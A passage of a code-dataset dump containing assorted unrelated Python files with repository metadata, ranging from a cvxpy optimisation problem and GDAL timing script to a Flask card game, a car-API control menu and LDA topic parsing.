await ctx.send(embed=self.build_embed(codepoint))
def setup(bot: Bot) -> None:
"""Load the Twemoji cog."""
bot.add_cog(Twemoji(bot))
| 34.066225 | 110 | 0.614891 |
c916bd42a9f49b86089b3c70e101b95ec26db97d | 198 | py | Python | Lecture 28/Lecture28HWAssignment4.py | AtharvaJoshi21/PythonPOC | 6b95eb5bab7b28e9811e43b39e863faf2ee7565b | [
"MIT"
] | 1 | 2019-04-27T15:37:04.000Z | 2019-04-27T15:37:04.000Z | Lecture 28/Lecture28HWAssignment4.py | AtharvaJoshi21/PythonPOC | 6b95eb5bab7b28e9811e43b39e863faf2ee7565b | [
"MIT"
] | null | null | null | Lecture 28/Lecture28HWAssignment4.py | AtharvaJoshi21/PythonPOC | 6b95eb5bab7b28e9811e43b39e863faf2ee7565b | [
"MIT"
] | 1 | 2020-08-14T06:57:08.000Z | 2020-08-14T06:57:08.000Z | # WAP to accept a filename from user and print all words starting with capital letters.
def main():
inputFilePath = input("Please enter file name: ")
if __name__ == "__main__":
main() | 24.75 | 87 | 0.686869 |
c916da29a2d83f2c59eacc745d8499ef2a44d2e6 | 1,215 | py | Python | tests/python-playground/least_abs_dev_0.py | marcocannici/scs | 799a4f7daed4294cd98c73df71676195e6c63de4 | [
"MIT"
] | 25 | 2017-06-30T15:31:33.000Z | 2021-04-21T20:12:18.000Z | tests/python-playground/least_abs_dev_0.py | marcocannici/scs | 799a4f7daed4294cd98c73df71676195e6c63de4 | [
"MIT"
] | 34 | 2017-06-07T01:18:17.000Z | 2021-04-24T09:44:00.000Z | tests/python-playground/least_abs_dev_0.py | marcocannici/scs | 799a4f7daed4294cd98c73df71676195e6c63de4 | [
"MIT"
] | 13 | 2017-06-07T01:16:09.000Z | 2021-06-07T09:12:56.000Z | # This is automatically-generated code.
# Uses the jinja2 library for templating.
import cvxpy as cp
import numpy as np
import scipy as sp
# setup
problemID = "least_abs_dev_0"
prob = None
opt_val = None
# Variable declarations
import scipy.sparse as sps
np.random.seed(0)
m = 5000
n = 200
A = np.random.randn(m,n);
A = A*sps.diags([1 / np.sqrt(np.sum(A**2, 0))], [0])
b = A.dot(10*np.random.randn(n) + 5*np.random.randn(1))
k = max(m//50, 1)
idx = np.random.randint(0, m, k)
b[idx] += 100*np.random.randn(k)
# Problem construction
x = cp.Variable(n)
v = cp.Variable(1)
prob = cp.Problem(cp.Minimize(cp.norm1(A*x + v*np.ones(m) - b)))
# Problem collection
# Single problem collection
problemDict = {
"problemID" : problemID,
"problem" : prob,
"opt_val" : opt_val
}
problems = [problemDict]
# For debugging individual problems:
if __name__ == "__main__":
def printResults(problemID = "", problem = None, opt_val = None):
print(problemID)
problem.solve()
print("\tstatus: {}".format(problem.status))
print("\toptimal value: {}".format(problem.value))
print("\ttrue optimal value: {}".format(opt_val))
printResults(**problems[0])
| 18.409091 | 69 | 0.650206 |
c9188684a1a8b8220b62b9249ea8815fc31f7412 | 2,621 | py | Python | experimentations/20-climate-data/test-perf.py | Kitware/spark-mpi-experimentation | 9432b63130059fc54843bc5ca6f2f5510e5a4098 | [
"BSD-3-Clause"
] | 4 | 2017-06-15T16:36:01.000Z | 2021-12-25T09:13:22.000Z | experimentations/20-climate-data/test-perf.py | Kitware/spark-mpi-experimentation | 9432b63130059fc54843bc5ca6f2f5510e5a4098 | [
"BSD-3-Clause"
] | 1 | 2018-09-28T23:32:42.000Z | 2018-09-28T23:32:42.000Z | experimentations/20-climate-data/test-perf.py | Kitware/spark-mpi-experimentation | 9432b63130059fc54843bc5ca6f2f5510e5a4098 | [
"BSD-3-Clause"
] | 6 | 2017-07-22T00:10:00.000Z | 2021-12-25T09:13:11.000Z | from __future__ import print_function
import os
import sys
import time
import gdal
import numpy as np
# -------------------------------------------------------------------------
# Files to process
# -------------------------------------------------------------------------
fileNames = [
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2006.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2007.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2008.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2009.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2010.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2011.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2012.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2013.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2014.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2015.tif',
]
basepath = '/data/sebastien/SparkMPI/data/gddp'
# -------------------------------------------------------------------------
# Read file and output (year|month, temp)
# -------------------------------------------------------------------------
def readFile(fileName):
year = fileName.split('_')[-1][:-4]
print('year', year)
dataset = gdal.Open('%s/%s' % (basepath, fileName))
for bandId in range(dataset.RasterCount):
band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
for value in band.flatten():
yield (year, value)
# -----------------------------------------------------------------------------
def readFileAndCompute(fileName):
year = fileName.split('_')[-1][:-4]
print('year', year)
dataset = gdal.Open('%s/%s' % (basepath, fileName))
total = 0
count = 0
for bandId in range(dataset.RasterCount):
band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
for value in band.flatten():
if value < 50000:
total += value
count += 1
return (year, total / count)
# -----------------------------------------------------------------------------
def readDoNothing(fileName):
year = fileName.split('_')[-1][:-4]
print('year', year)
dataset = gdal.Open('%s/%s' % (basepath, fileName))
for bandId in range(dataset.RasterCount):
band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
print(band.shape)
# -------------------------------------------------------------------------
# Read timing
# -------------------------------------------------------------------------
t0 = time.time()
for fileName in fileNames:
readDoNothing(fileName)
t1 = time.time()
print('### Total execution time - %s ' % str(t1 - t0))
| 33.177215 | 79 | 0.518123 |
c9195aa10c6d748883a1b2125a3a031fa6170f06 | 1,380 | py | Python | deluca/envs/lung/__init__.py | AlexanderJYu/deluca | 9e8b0d84d2eb0a58ff82a951b42881bdb2dc9f00 | [
"Apache-2.0"
] | null | null | null | deluca/envs/lung/__init__.py | AlexanderJYu/deluca | 9e8b0d84d2eb0a58ff82a951b42881bdb2dc9f00 | [
"Apache-2.0"
] | null | null | null | deluca/envs/lung/__init__.py | AlexanderJYu/deluca | 9e8b0d84d2eb0a58ff82a951b42881bdb2dc9f00 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO
# - interp smh
import jax.numpy as jnp
from deluca import JaxObject
DEFAULT_PRESSURE_RANGE = (5.0, 35.0)
DEFAULT_KEYPOINTS = [1e-8, 1.0, 1.5, 3.0]
class BreathWaveform(JaxObject):
"""Waveform generator with shape /‾\_"""
def __init__(self, range=None, keypoints=None):
self.lo, self.hi = range or DEFAULT_PRESSURE_RANGE
self.xp = jnp.asarray([0] + (keypoints or DEFAULT_KEYPOINTS))
self.fp = jnp.asarray([self.lo, self.hi, self.hi, self.lo, self.lo])
self.period = self.xp[-1]
def at(self, t):
# return jnp.interp(t, self.xp, self.fp, period=self.period)
return jnp.interp(t, self.xp, self.fp, period=3)
def phase(self, t):
return jnp.searchsorted(self.xp, t % self.period, side="right")
__all__ = ["BreathWaveform"]
| 32.857143 | 76 | 0.695652 |
c91a77c07622a3736aa47e0888f81515c8655b66 | 746 | py | Python | ivoire/__init__.py | Julian/Ivoire | af3f4ac77daf9d6c5167ef8a906557cc9d1d0ba7 | [
"MIT"
] | 9 | 2015-02-05T12:16:47.000Z | 2022-02-04T07:48:23.000Z | ivoire/__init__.py | Julian/Ivoire | af3f4ac77daf9d6c5167ef8a906557cc9d1d0ba7 | [
"MIT"
] | 1 | 2018-02-11T16:31:36.000Z | 2018-02-11T16:31:36.000Z | ivoire/__init__.py | Julian/Ivoire | af3f4ac77daf9d6c5167ef8a906557cc9d1d0ba7 | [
"MIT"
] | null | null | null | """
Ivoire is an RSpec-like testing framework for Python.
Globals defined in this module:
current_result: Should be set by a runner to an object that has the same
interface as unittest.TestResult. It will be used by every
example that is instantiated to record test results during
the runtime of Ivoire.
__version__: The current version information
"""
try:
from importlib import metadata
except ImportError:
import importlib_metadata as metadata
from ivoire.standalone import Example, describe
from ivoire.manager import ContextManager
__version__ = metadata.version("ivoire")
_manager = ContextManager()
context = _manager.create_context
current_result = None
| 26.642857 | 78 | 0.727882 |
c91fcc058836389aa81c0420f1fedf01f1106ff3 | 1,699 | py | Python | similarity.py | Blair-Johnson/faceswap | 79b75f7f112acb3bf6b228116facc4d0812d2099 | [
"MIT"
] | null | null | null | similarity.py | Blair-Johnson/faceswap | 79b75f7f112acb3bf6b228116facc4d0812d2099 | [
"MIT"
] | null | null | null | similarity.py | Blair-Johnson/faceswap | 79b75f7f112acb3bf6b228116facc4d0812d2099 | [
"MIT"
] | 1 | 2021-11-04T08:21:07.000Z | 2021-11-04T08:21:07.000Z | # Blair Johnson 2021
from facenet_pytorch import InceptionResnetV1, MTCNN
import numpy as np
def create_embeddings(images):
'''
Take an iterable of image candidates and return an iterable of image embeddings.
'''
if type(images) != list:
images = [images]
extractor = MTCNN()
encoder = InceptionResnetV1(pretrained='vggface2').eval()
embeddings = []
for image in images:
cropped_img = extractor(image)
embeddings.append(encoder(cropped_img.unsqueeze(0)))
return embeddings
def candidate_search(candidates, target):
'''
Take an iterable of candidates and a target image and determine the best candidate fit
'''
cand_embs = create_embeddings(candidates)
target_embs = create_embeddings(target)[0]
best_loss = np.inf
best_candidate = np.inf
for i,embedding in enumerate(cand_embs):
loss = np.linalg.norm(target_embs.detach().numpy()-embedding.detach().numpy(), ord='fro')
if loss < best_loss:
best_loss = loss
best_candidate = i
return candidates[i], best_candidate
if __name__ == '__main__':
from PIL import Image
import matplotlib.pyplot as plt
test1 = np.array(Image.open('/home/bjohnson/Pictures/fake_face.jpg'))
test2 = np.array(Image.open('/home/bjohnson/Pictures/old_face.jpg'))
test3 = np.array(Image.open('/home/bjohnson/Pictures/young_face.jpg'))
target = np.array(Image.open('/home/bjohnson/Pictures/profile_pic_lake_louise.png'))
candidates = [test1,test2,test3]
chosen, index = candidate_search(candidates, target)
print(index)
#plt.imshow(candidate_search(candidates, target))
| 29.807018 | 97 | 0.683343 |
c920d8ceac18d8c9ff46fde63a7fa287e05e877b | 6,075 | py | Python | opentamp/domains/robot_manipulation_domain/generate_base_prob.py | Algorithmic-Alignment-Lab/openTAMP | f0642028d551d0436b3a3dbc3bfb2f23a00adc14 | [
"MIT"
] | 4 | 2022-02-13T15:52:18.000Z | 2022-03-26T17:33:13.000Z | opentamp/domains/robot_manipulation_domain/generate_base_prob.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | 1 | 2022-02-13T22:48:09.000Z | 2022-02-13T22:48:09.000Z | opentamp/domains/robot_manipulation_domain/generate_base_prob.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | from IPython import embed as shell
import itertools
import numpy as np
import random
# SEED = 1234
NUM_PROBS = 1
NUM_CLOTH = 4
filename = "probs/base_prob.prob"
GOAL = "(RobotAt baxter robot_end_pose)"
# init Baxter pose
BAXTER_INIT_POSE = [0, 0, 0]
BAXTER_END_POSE = [0, 0, 0]
R_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [0, -0.8436, -0.09, 0.91, 0.043, 1.5, -0.05] # [ 0.1, -1.36681967, -0.23718529, 1.45825713, 0.04779009, 1.48501637, -0.92194262]
L_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [-0.6, -1.2513685 , -0.63979997, 1.41307933, -2.9520384, -1.4709618, 2.69274026]
OPEN_GRIPPER = [0.02]
CLOSE_GRIPPER = [0.015]
MONITOR_LEFT = [np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
MONITOR_RIGHT = [-np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
CLOTH_ROT = [0, 0, 0]
TABLE_GEOM = [1.23/2, 2.45/2, 0.97/2]
TABLE_POS = [1.23/2-0.1, 0, 0.97/2-0.375-0.665]
TABLE_ROT = [0,0,0]
ROBOT_DIST_FROM_TABLE = 0.05
REGION1 = [np.pi/4]
REGION2 = [0]
REGION3 = [-np.pi/4]
REGION4 = [-np.pi/2]
cloth_init_poses = np.ones((NUM_CLOTH, 3)) * 0.615
cloth_init_poses = cloth_init_poses.tolist()
def get_baxter_pose_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
s = ""
s += "(left {} {}), ".format(name, LArm)
s += "(left_gripper {} {}), ".format(name, G)
s += "(right {} {}), ".format(name, RArm)
s += "(right_gripper {} {}), ".format(name, G)
s += "(value {} {}), ".format(name, Pos)
return s
def get_baxter_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
s = ""
s += "(geom {})".format(name)
s += "(left {} {}), ".format(name, LArm)
s += "(left_gripper {} {}), ".format(name, G)
s += "(right {} {}), ".format(name, RArm)
s += "(right_gripper {} {}), ".format(name, G)
s += "(pose {} {}), ".format(name, Pos)
return s
def get_undefined_robot_pose_str(name):
s = ""
s += "(left {} undefined), ".format(name)
s += "(left_gripper {} undefined), ".format(name)
s += "(right {} undefined), ".format(name)
s += "(right_gripper {} undefined), ".format(name)
s += "(value {} undefined), ".format(name)
return s
def get_undefined_symbol(name):
s = ""
s += "(value {} undefined), ".format(name)
s += "(rotation {} undefined), ".format(name)
return s
def main():
for iteration in range(NUM_PROBS):
s = "# AUTOGENERATED. DO NOT EDIT.\n# Configuration file for CAN problem instance. Blank lines and lines beginning with # are filtered out.\n\n"
s += "# The values after each attribute name are the values that get passed into the __init__ method for that attribute's class defined in the domain configuration.\n"
s += "Objects: "
s += "Baxter (name baxter); "
for i in range(NUM_CLOTH):
s += "Cloth (name {}); ".format("cloth{0}".format(i))
s += "ClothTarget (name {}); ".format("cloth_target_{0}".format(i))
s += "ClothTarget (name {}); ".format("cloth{0}_init_target".format(i))
s += "ClothTarget (name {}); ".format("cloth{0}_end_target".format(i))
s += "BaxterPose (name {}); ".format("cloth_grasp_begin".format(i))
s += "BaxterPose (name {}); ".format("cloth_grasp_end".format(i))
s += "BaxterPose (name {}); ".format("cloth_putdown_begin".format(i))
s += "BaxterPose (name {}); ".format("cloth_putdown_end".format(i))
s += "ClothTarget (name {}); ".format("middle_target_1")
s += "ClothTarget (name {}); ".format("middle_target_2")
s += "ClothTarget (name {}); ".format("left_mid_target")
s += "ClothTarget (name {}); ".format("right_mid_target")
s += "BaxterPose (name {}); ".format("robot_init_pose")
s += "BaxterPose (name {}); ".format("robot_end_pose")
s += "Obstacle (name {}) \n\n".format("table")
s += "Init: "
for i in range(NUM_CLOTH):
s += "(geom cloth{0}), ".format(i)
s += "(pose cloth{0} {1}), ".format(i, [0, 0, 0])
s += "(rotation cloth{0} {1}), ".format(i, [0, 0, 0])
s += "(value cloth{0}_init_target [0, 0, 0]), ".format(i)
s += "(rotation cloth{0}_init_target [0, 0, 0]), ".format(i)
s += "(value cloth_target_{0} [0, 0, 0]), ".format(i)
s += "(rotation cloth_target_{0} [0, 0, 0]), ".format(i)
s += "(value cloth{0}_end_target [0, 0, 0]), ".format(i)
s += "(rotation cloth{0}_end_target [0, 0, 0]), ".format(i)
s += "(value middle_target_1 [0, 0, 0]), "
s += "(rotation middle_target_1 [0, 0, 0]), "
s += "(value middle_target_2 [0, 0, 0]), "
s += "(rotation middle_target_2 [0, 0, 0]), "
s += "(value left_mid_target [0, 0, 0]), "
s += "(rotation left_mid_target [0, 0, 0]), "
s += "(value right_mid_target [0, 0, 0]), "
s += "(rotation right_mid_target [0, 0, 0]), "
s += get_undefined_robot_pose_str("cloth_grasp_begin".format(i))
s += get_undefined_robot_pose_str("cloth_grasp_end".format(i))
s += get_undefined_robot_pose_str("cloth_putdown_begin".format(i))
s += get_undefined_robot_pose_str("cloth_putdown_end".format(i))
s += get_baxter_str('baxter', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
s += get_baxter_pose_str('robot_init_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
# s += get_baxter_pose_str('robot_end_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_END_POSE)
s += get_undefined_robot_pose_str('robot_end_pose')
s += "(geom table {}), ".format(TABLE_GEOM)
s += "(pose table {}), ".format(TABLE_POS)
s += "(rotation table {}); ".format(TABLE_ROT)
s += "(RobotAt baxter robot_init_pose),"
s += "(StationaryBase baxter), "
s += "(IsMP baxter), "
s += "(WithinJointLimit baxter), "
s += "(StationaryW table) \n\n"
s += "Goal: {}".format(GOAL)
with open(filename, "w") as f:
f.write(s)
if __name__ == "__main__":
main()
| 41.047297 | 175 | 0.576461 |
c9210c12cb167b3a01782592accbb83cee14ae03 | 2,633 | py | Python | tests/views/test_hsva.py | ju-sh/colorviews | b9757dd3a799d68bd89966852f36f06f21e36072 | [
"MIT"
] | 5 | 2021-06-10T21:12:16.000Z | 2022-01-14T05:04:03.000Z | tests/views/test_hsva.py | ju-sh/colorviews | b9757dd3a799d68bd89966852f36f06f21e36072 | [
"MIT"
] | null | null | null | tests/views/test_hsva.py | ju-sh/colorviews | b9757dd3a799d68bd89966852f36f06f21e36072 | [
"MIT"
] | null | null | null | import pytest
from colorviews import AlphaColor
class TestGetAttr:
@pytest.mark.parametrize("attr, expected", [
("h", 0.75),
("s", 0.47),
("v", 0.29),
("a", 0.79),
])
def test_valid(self, attr, expected):
color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
assert round(getattr(color.hsva, attr), 4) == expected
@pytest.mark.parametrize("attr", [
"r", "b",
])
def test_invalid(self, attr):
color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
with pytest.raises(AttributeError):
getattr(color.hsva, attr)
class TestSetAttr:
@pytest.mark.parametrize("attr, val", [
("h", 0.75),
("s", 0.5),
("v", 0.29),
("a", 0.49),
])
def test_valid(self, attr, val):
color = AlphaColor.from_hsva(0.45, 0.15, 0.89, 0.79)
setattr(color.hsva, attr, val)
assert round(getattr(color.hsva, attr), 4) == val
@pytest.mark.parametrize("attr", [
"r", "g",
])
def test_invalid(self, attr):
color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
with pytest.raises(AttributeError):
setattr(color.hsva, attr, 0.1)
@pytest.mark.parametrize("hsva_dict, expected", [
({"h": 91 / 360}, 0x394a2980),
({"s": 0.15}, 0x443f4a80),
({"v": 0.74}, 0x9268bd80),
({"a": 0.80}, 0x39294acc),
({"h": 91 / 360, "s": 0.15}, 0x444a3f80),
({"h": 91 / 360, "v": 0.74}, 0x91bd6880),
({"h": 91 / 360, "v": 0.74, "a": 0.25}, 0x91bd6840),
({"s": 0.15, "v": 0.74}, 0xafa0bd80),
({"h": 91 / 360, "s": 0.15, "v": 0.74}, 0xaebda080),
])
def test_replace(hsva_dict, expected):
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.5)
assert int(color.hsva.replace(**hsva_dict)) == expected
class TestVals:
@pytest.mark.parametrize("vals", [
[0.2, 0.4, 0.6, 0.1],
(0.6, 0.2, 0.4, 0.54),
])
def test_setter_valid(self, vals):
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
color.hsva.vals = vals
assert [round(val, 4) for val in color.hsva] == list(vals)
@pytest.mark.parametrize("wrong_vals", [
[0.2, 0.4],
(1.6, 0.2, 0.4),
(0.6, 0.2, 0.4, 1.0, 0.8),
])
def test_setter_invalid(self, wrong_vals):
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
with pytest.raises(ValueError):
color.hsva.vals = wrong_vals
def test_vals_getter():
vals = (0.75, 0.45, 0.29, 0.79)
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
assert [round(val, 4) for val in color.hsva.vals] == list(vals)
| 29.920455 | 67 | 0.545765 |
c92170ef42c7d1d4c09bcc11c88becf053c48250 | 2,645 | py | Python | app/__init__.py | Cinquiom/fifty-cents-frontend | 946f564a87127f5820111321cd48441cc414d277 | [
"MIT"
] | null | null | null | app/__init__.py | Cinquiom/fifty-cents-frontend | 946f564a87127f5820111321cd48441cc414d277 | [
"MIT"
] | null | null | null | app/__init__.py | Cinquiom/fifty-cents-frontend | 946f564a87127f5820111321cd48441cc414d277 | [
"MIT"
] | null | null | null | import random, logging
from collections import Counter
from flask import Flask, session, request, render_template, jsonify
from app.util import unflatten
from app.fiftycents import FiftyCentsGame
from app.fiftycents import Card
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
app = Flask(__name__)
app.secret_key = 'peanut'
game = FiftyCentsGame(2)
@app.route("/", methods=['POST', 'GET'])
def index():
if request.method == "POST":
data = unflatten(request.form.to_dict())
for k,v in data["play"].items():
data["play"][k] = int(v)
game.play(data)
player = {"hand": {k: 0 for k in Card.RANKS},
"coins": game.player.coins,
"points": game.player.total_score}
for k, v in dict(Counter([c.rank for c in game.player.hand])).items():
player["hand"][k] = v
goal = {"set_num": game.current_round[0],
"set_size": game.current_round[1]}
pile = [c.rank for c in game.open_deck.cards]
return render_template('main.html',
player=player,
pile=pile,
goal=goal,
playable = sorted([c for c in game.cards_in_play if c not in ["2", "JOKER"]]),
player_has_drawn=game.player_has_drawn,
game_over = game.game_over,
player_score = game.player.get_current_score(),
ai_score = game.AI.get_current_score(),
ai_total = game.AI.total_score)
@app.route("/info/", methods=['GET'])
def info():
return jsonify({"player": {
"hand": [c.rank for c in game.player.hand],
"played": [c.rank for c in game.player.played_cards],
"coins": game.player.coins,
"score": game.player.get_current_score()
},
"computer": {
"hand": [c.rank for c in game.AI.hand],
"played": [c.rank for c in game.AI.played_cards],
"coins": game.AI.coins,
"score": game.AI.get_current_score()
},
"game": {
"open": [c.rank for c in game.open_deck.cards],
"cards_in_play": list(game.cards_in_play),
"round": game.current_round
}
})
| 38.897059 | 107 | 0.483554 |
c921d773c35312ecebe3d4b6eaaaef9e999e9c07 | 4,905 | py | Python | bluvo_test.py | JanJaapKo/BlUVO | 2a72b06a56069fee5bd118a12b846513096014b1 | [
"MIT"
] | null | null | null | bluvo_test.py | JanJaapKo/BlUVO | 2a72b06a56069fee5bd118a12b846513096014b1 | [
"MIT"
] | null | null | null | bluvo_test.py | JanJaapKo/BlUVO | 2a72b06a56069fee5bd118a12b846513096014b1 | [
"MIT"
] | null | null | null | import time
import logging
import pickle
import json
import consolemenu
from generic_lib import georeverse, geolookup
from bluvo_main import BlueLink
from tools.stamps import postOffice
from params import * # p_parameters are read
logging.basicConfig(format='%(asctime)s - %(levelname)-8s - %(filename)-18s - %(message)s', filename='bluvo_test.log',
level=logging.DEBUG)
menuoptions = ['0 exit',"1 Lock", "2 Unlock", "3 Status", "4 Status formatted", "5 Status refresh", "6 location", "7 loop status",
"8 Navigate to", '9 set Charge Limits', '10 get charge schedule', '11 get services', '12 poll car', '13 get stamps', '14 odometer', '15 get park location',
'16 get user info', '17 get monthly report', '18 get monthly report lists']
mymenu = consolemenu.SelectionMenu(menuoptions)
# heartbeatinterval, initsuccess = initialise(p_email, p_password, p_pin, p_vin, p_abrp_token, p_abrp_carmodel, p_WeatherApiKey,
# p_WeatherProvider, p_homelocation, p_forcepollinterval, p_charginginterval,
# p_heartbeatinterval)
bluelink = BlueLink(p_email, p_password, p_pin, p_vin, p_abrp_carmodel, p_abrp_token, p_WeatherApiKey, p_WeatherProvider, p_homelocation)
bluelink.initialise(p_forcepollinterval, p_charginginterval)
if bluelink.initSuccess:
#stampie = postOffice("hyundai", False)
while True:
for i in menuoptions:
print(i)
#try:
x = int(input("Please Select:"))
print(x)
if x == 0: exit()
if x == 1: bluelink.vehicle.api_set_lock('on')
if x == 2: bluelink.vehicle.api_set_lock('off')
if x == 3: print(bluelink.vehicle.api_get_status(False))
if x == 4:
status_record = bluelink.vehicle.api_get_status(False, False)
for thing in status_record:
print(thing + ": " + str(status_record[thing]))
if x == 5: print(bluelink.vehicle.api_get_status(True))
if x == 6:
locatie = bluelink.vehicle.api_get_location()
if locatie:
locatie = locatie['gpsDetail']['coord']
print(georeverse(locatie['lat'], locatie['lon']))
if x == 7:
while True:
# read semaphore flag
try:
with open('semaphore.pkl', 'rb') as f:
manualForcePoll = pickle.load(f)
except:
manualForcePoll = False
print(manualForcePoll)
updated, parsedStatus, afstand, googlelocation = bluelink.pollcar(manualForcePoll)
# clear semaphore flag
manualForcePoll = False
with open('semaphore.pkl', 'wb') as f:
pickle.dump(manualForcePoll, f)
if updated:
print('afstand van huis, rijrichting, snelheid en km-stand: ', afstand, ' / ',
parsedStatus['heading'], '/', parsedStatus['speed'], '/', parsedStatus['odometer'])
print(googlelocation)
print("range ", parsedStatus['range'], "soc: ", parsedStatus['chargeHV'])
if parsedStatus['charging']: print("Laden")
if parsedStatus['trunkopen']: print("kofferbak open")
if not (parsedStatus['locked']): print("deuren van slot")
if parsedStatus['dooropenFL']: print("bestuurdersportier open")
print("soc12v ", parsedStatus['charge12V'], "status 12V", parsedStatus['status12V'])
print("=============")
time.sleep(bluelink.heartbeatinterval)
if x == 8: print(bluelink.vehicle.api_set_navigation(geolookup(input("Press Enter address to navigate to..."))))
if x == 9:
invoer = input("Enter maximum for fast and slow charging (space or comma or semicolon or colon seperated)")
for delim in ',;:': invoer = invoer.replace(delim, ' ')
print(bluelink.vehicle.api_set_chargelimits(invoer.split()[0], invoer.split()[1]))
if x == 10: print(json.dumps(bluelink.vehicle.api_get_chargeschedule(),indent=4))
if x == 11: print(bluelink.vehicle.api_get_services())
if x == 12: print(str(bluelink.pollcar(True)))
if x == 13:
print( "feature removed")
if x == 14: print(bluelink.vehicle.api_get_odometer())
if x == 15: print(bluelink.vehicle.api_get_parklocation())
if x == 16: print(bluelink.vehicle.api_get_userinfo())
if x == 17: print(bluelink.vehicle.api_get_monthlyreport(2021,5))
if x == 18: print(bluelink.vehicle.api_get_monthlyreportlist())
input("Press Enter to continue...")
# except (ValueError) as err:
# print("error in menu keuze")
else:
logging.error("initialisation failed")
| 50.56701 | 171 | 0.601019 |
c92214401251c6b4745f3ba05c668f2913227e7f | 2,962 | py | Python | lda/test3/interpret_topics.py | kaiiam/amazon-continuation | 9faaba80235614e6eea3e305c423975f2ec72e3e | [
"MIT"
] | null | null | null | lda/test3/interpret_topics.py | kaiiam/amazon-continuation | 9faaba80235614e6eea3e305c423975f2ec72e3e | [
"MIT"
] | null | null | null | lda/test3/interpret_topics.py | kaiiam/amazon-continuation | 9faaba80235614e6eea3e305c423975f2ec72e3e | [
"MIT"
] | 1 | 2019-05-28T21:49:45.000Z | 2019-05-28T21:49:45.000Z | #!/usr/bin/env python3
"""
Author : kai
Date : 2019-06-26
Purpose: Rock the Casbah
"""
import argparse
import sys
import re
import csv
# --------------------------------------------------
def get_args():
"""get command-line arguments"""
parser = argparse.ArgumentParser(
description='Argparse Python script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument(
# 'positional', metavar='str', help='A positional argument')
parser.add_argument(
'-a',
'--arg',
help='A named string argument',
metavar='str',
type=str,
default='')
parser.add_argument(
'-i',
'--int',
help='A named integer argument',
metavar='int',
type=int,
default=0)
parser.add_argument(
'-f', '--flag', help='A boolean flag', action='store_true')
return parser.parse_args()
# --------------------------------------------------
def warn(msg):
"""Print a message to STDERR"""
print(msg, file=sys.stderr)
# --------------------------------------------------
def die(msg='Something bad happened'):
"""warn() and exit with error"""
warn(msg)
sys.exit(1)
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
str_arg = args.arg
int_arg = args.int
flag_arg = args.flag
#pos_arg = args.positional
#read and open the annotations file
intpro_dict = {}
with open('InterPro_entry_list.tsv') as csvfile:
reader = csv.DictReader(csvfile, delimiter='\t')
for row in reader:
intpro_dict[row['ENTRY_AC']] = row['ENTRY_NAME']
with open('model_topics.txt', 'r') as file:
model_topics = file.read().replace('\n', '')
model_topics = re.sub("'", "", model_topics)
model_topics = re.sub("\[", "", model_topics)
model_topics = re.sub("\]", "", model_topics)
mtl = model_topics.split('), ')
with open('output_topics.tsv' ,'w') as f:
print('Topic\tModel_coefficient\tInterpro_ID\tInterPro_ENTRY_NAME', file=f)
for list in mtl:
topic = list[1]
split_list = list.split()
id_re = re.compile('IPR\d{3}')
c_words = []
for w in split_list:
match = id_re.search(w)
if match:
c_words.append(w)
c_words = [re.sub('"', '', i) for i in c_words]
for w in c_words:
re.sub('\)', '', w)
coef, intpro = w.split('*')
intpro = intpro[:9]
if intpro in intpro_dict.keys():
label = intpro_dict[intpro]
else:
label = ''
print('{}\t{}\t{}\t{}'.format(topic,coef,intpro,label), file=f)
# --------------------------------------------------
if __name__ == '__main__':
main()
| 26.684685 | 83 | 0.497637 |
c924841b1d689ef522dd4926df95b7101d1bb341 | 292 | py | Python | app/users/urls.py | ManojKumarMRK/recipe-app-api | f518e91fc335c46eb1034d865256c94bb3e56b32 | [
"MIT"
] | null | null | null | app/users/urls.py | ManojKumarMRK/recipe-app-api | f518e91fc335c46eb1034d865256c94bb3e56b32 | [
"MIT"
